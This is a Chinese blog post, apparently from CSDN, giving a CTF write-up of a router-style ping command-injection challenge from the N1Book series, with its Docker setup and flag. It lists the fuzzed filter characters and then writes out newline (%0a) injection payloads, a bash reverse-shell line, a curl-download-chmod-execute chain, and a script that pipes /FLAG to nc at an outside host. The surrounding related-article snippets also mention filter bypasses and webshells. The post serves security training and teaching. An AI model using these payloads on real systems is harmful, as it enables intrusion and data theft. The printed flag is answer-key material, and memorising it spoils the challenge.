CTFer成长之路之命令执行漏洞

最新推荐文章于 2024-07-05 16:17:14 发布
最新推荐文章于 2024-07-05 16:17:14 发布
阅读量162 收藏
点赞数
文章标签: web安全 网络安全 安全 java c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_76827504/article/details/130405887
版权
该文章描述了一个CTF挑战,涉及命令执行漏洞。通过fuzz测试发现字符过滤,利用%0a注入新命令,因环境无bash和python,采用其他方式执行ls和cat命令,通过创建并执行1.sh脚本,最终在192.168.10.3机器上获取到flag。
摘要由CSDN通过智能技术生成

命令执行漏洞CTF

死亡ping命令

题目描述:

路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串,试试看如何绕过呢?

docker-compose.yml

version: "3.2"

services:
 converter:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest
ports:
  - 80:80

启动方式

docker-compose up -d

题目Flag

n1book{6fa82809179d7f19c67259aa285a7729}

Writeup

通过测试可以发现是存在一些黑名单过滤的,被拦截时候显示IP包含恶意字符。

利用fuzz的方式能够知道过滤了以下字符:

[“$”, “{”, “}”, “`”, “;”, “&”, “|”, “(”, “)”, “”", “'”, “~”, “!”, “@”, “#”, “%”, “^”, “*”, “[”, “]”, “”, “:”, “-”, “_”];

通过%0a能够注入新的一条命令进行执行。在这里插入图片描述

由于docker是没有bash、python程序的,并且sh反弹是不行的。

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

关闭防火墙

新建1.sh文件,内容为:

ls
cat /FLAG | nc 192.168.10.3 8080

目前是能通过折中的方式执行任意命令

请求bash文件到tmp目录

127.0.0.1%0acurl 192.168.10.3/1.sh > /tmp/1.sh

结果如下
在这里插入图片描述

给bash加权限

127.0.0.1%0achmod 777 /tmp/1.sh

结果如下在这里插入图片描述

执行bash文件

127.0.0.1%0ash /tmp/1.sh

结果如下在这里插入图片描述

192.168.10.3机器上进行监听8080端口

nc -l 8080

结果如下
在这里插入图片描述

得到flag:n1book{6fa82809179d7f19c67259aa285a7729}

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

网安白菜菜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令执行漏洞CTF
qq_46085232的博客
07-09 414
命令执行漏洞CTF[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping总结 作为菜鸟的我,开始想通过玩玩ctf,加深自己对漏洞的理解,和掌握一些绕过的思路。真的很好玩 [ACTF2020 新生赛]Exec 这是我做的第一道有关命令执行的题。(题目简单,就不贴图了) 1.通过标题,和一进去的ping的页面,就知道这里考的是命令执行,又因为这里是新生赛,难度也不大 2.通过我所学的知识,用‘;ls’,查看当前目录,然后就行通过echo写入一句话后门,也成功写入。用蚁剑连接,
CTF-命令执行漏洞
Reaches_r的博客
08-10 198
如以下靶机
网络安全CTF系列培训教程之Web篇-命令执行漏洞
最新发布
ctfayang的博客
07-05 495
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。
CTF命令执行漏洞(python)
weixin_46184517的博客
04-19 1186
1. 打开环境,页面有两个按钮,分别为‘选择文件’&&‘上传’ 2. 右键检查页面源代码,提示会将上图的文件当作python代码执行,只允许上传‘jpg’&&‘png’为后缀的图片 3. 我们新建一个txt文件,将python代码写入文件 (1)为什么要执行import os? 我们在python下写程序,需要对文件以及文件夹或者其他的进行一系列的操作。但是,我们怎么在python中对文件进行操作呢?这就引入了os模块了。 例如: os.name返回当前系统 os.getc
ctf命令执行漏洞(一)
wlllllianqing的博客
10-12 2094
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
命令执行漏洞(教材:从零到一 CTFer成长之路
L2329794714的博客
03-18 5677
一、什么是命令执行漏洞 由于开发者使用一些执行命令函数其未对用户输入的数据进行安全检查时,可注入恶意命令,实现恶意命令执行命令执行一般发生在远程,故称远程命令执行RCE(Remote Command Exec或Remote Code Exec)。 以PHP的syste()函数为例: <?php $str = $_GET['name']; system("echo hello ".$str); //调用系统程序执行命令 ?> 正常输入?name=lusong,
命令执行漏洞CTFSHOW(简单利用)
weixin_44431280的博客
03-05 1381
命令执行漏洞CTFSHOW(简单利用) 远程命令执行简介和原理可以参考文章Web安全—远程命令/代码执行(RCE) 远程命令执行1: 1,题目简介分析 代码分析:$_GET()函数读取URL传过来的C参数和值,然后使用preg_match函数判断传过来的参数值是否包含flag值(用来对传入的参数值进行过滤),然后使用eval()函数执行C参数传过来的值。 2,思路分析 通过信息收集判断网站操作系统类型,然后通过参数传入值执行操作系统命令,因为未对参数值进行限制,所以此处存在命令执行和代码执行漏洞 通过
命令执行漏洞
Jim的博客
09-29 1105
CTF命令执行漏洞的一些杂七杂八的笔记
chizhaji的博客
02-06 2083
CTF命令执行漏洞的一些杂七杂八的笔记 命令执行漏洞主要是由system、exec、shell_exec,eval等函数能把用户输入的内容当作是命令来执,反引号一般的作用是与system类似,都是把内容作为命令执行。//不过在这些命令执行函数里面,只有system是有回显的,其他的函数都需要搭配着echo来使用 关于过滤的一些笔记 一般看到有过滤的我都会直接先用echo "npfs "; include($_GET['url']); ?>&url=php://filter/read=conv
CTF-命令执行【超详细】
不知名白帽的博客
09-04 9662
CTF-命令执行【超详细】
ctf 命令执行
weixin_74427106的博客
04-01 287
什么是命令执行漏洞命令执行漏洞就是服务器端没有对客户的一些命令进行过滤,导致客户任意拼接命令使网站进行执行;过滤了flag所以我们只要命令里不出现flag即可所以构造。这里我不知道为啥不能用一句话木马,后续知道了在补充;运行后打开源码后即可得到flag。运行之后查看源码即可得到flag。ctfshow web入门29。先分析代码发现过滤了.和空格。这里我会个一句话木马。
16.CTF-web安全-命令执行
woo233的博客
09-29 967
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
CTFweb命令执行知识点
cutesharkl的博客
07-08 707
命令注入:命令注入是一种常见的命令执行漏洞,攻击者可以通过将恶意命令注入到应用程序中的用户输入来执行系统命令命令执行的原理:命令执行漏洞通常发生在应用程序未正确过滤、验证或转义用户输入的情况下。输入验证与过滤:对于用户输入,应该进行必要的验证和过滤,以防止恶意输入进入命令执行函数。操作系统命令命令执行漏洞通常发生在应用程序中执行操作系统命令的函数上。绕过技巧:在实际的命令执行漏洞利用中,可能需要使用一些技巧来绕过安全机制。操作系统特定命令命令执行漏洞也可能与特定的操作系统相关。
BUU N1BOOK题目死亡ping命令
weixin_48876267的博客
11-30 761
介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串 version: "3.2" services: converter: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest ports: - 80:80 本地搭建docker-compose 打开题目 输入127.0.0.1&&id,发现报错。存在恶意字符过滤 抓包进行fuzz扫描测试 fu.
BUUCTFWeb】Exec(命令执行漏洞
qq_70434663的博客
03-02 1080
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞命令执行就用命令拼接符执行漏洞命令就行。
CTF-web暴力破解
IT小学子的博客
05-03 796
web暴力破解 针对wordpress网站 use auxiliary/scanner/http/wordpress_login_enum 为当前wordpress模块 set username admin 网站用户名 set pass_file /usr/share/wordpress/dirb/common.txt 密码字典位置 set targeturl...
从0到1:CTFer成长之路 sql注入1
07-27
CTFer成长之路中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你需要了解SQL注入的原理和基本概念。SQL注入通常发生在应用程序与数据库之间的交互过程中。当应用程序未能正确过滤用户输入数据,并且将用户输入直接拼接到SQL查询语句中时,攻击者可以通过构造恶意输入来修改、删除或绕过原本应该执行的查询操作,从而获取敏感信息或控制数据库。 接下来,你需要学习一些常见的SQL注入技巧和工具。例如,可以使用单引号 `'` 来进行字符串注入,使用注释符 `--` 来注释掉原本的查询语句,使用 UNION 语句来进行查询结果的合并等等。同时,了解一些常见的防御措施,如参数化查询、输入验证和输出编码等,可以帮助你更好地理解和应对SQL注入攻击。 在实践中,你可以尝试挑战一些有关SQL注入的CTF题目。这些题目通常会提供一个具有漏洞的应用程序和一个数据库,你需要通过利用SQL注入漏洞来获取敏感信息或执行特定操作。通过解决这些题目,你可以加深对SQL注入的理解,并且熟悉常见的攻击场景和解决方法。 最后,记得在学习和实践过程中保持合法合规。只在合法授权的情况下进行演练和挑战,切勿用于非法用途。同时,及时更新和修补应用程序的漏洞,以保护自己和他人的信息安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值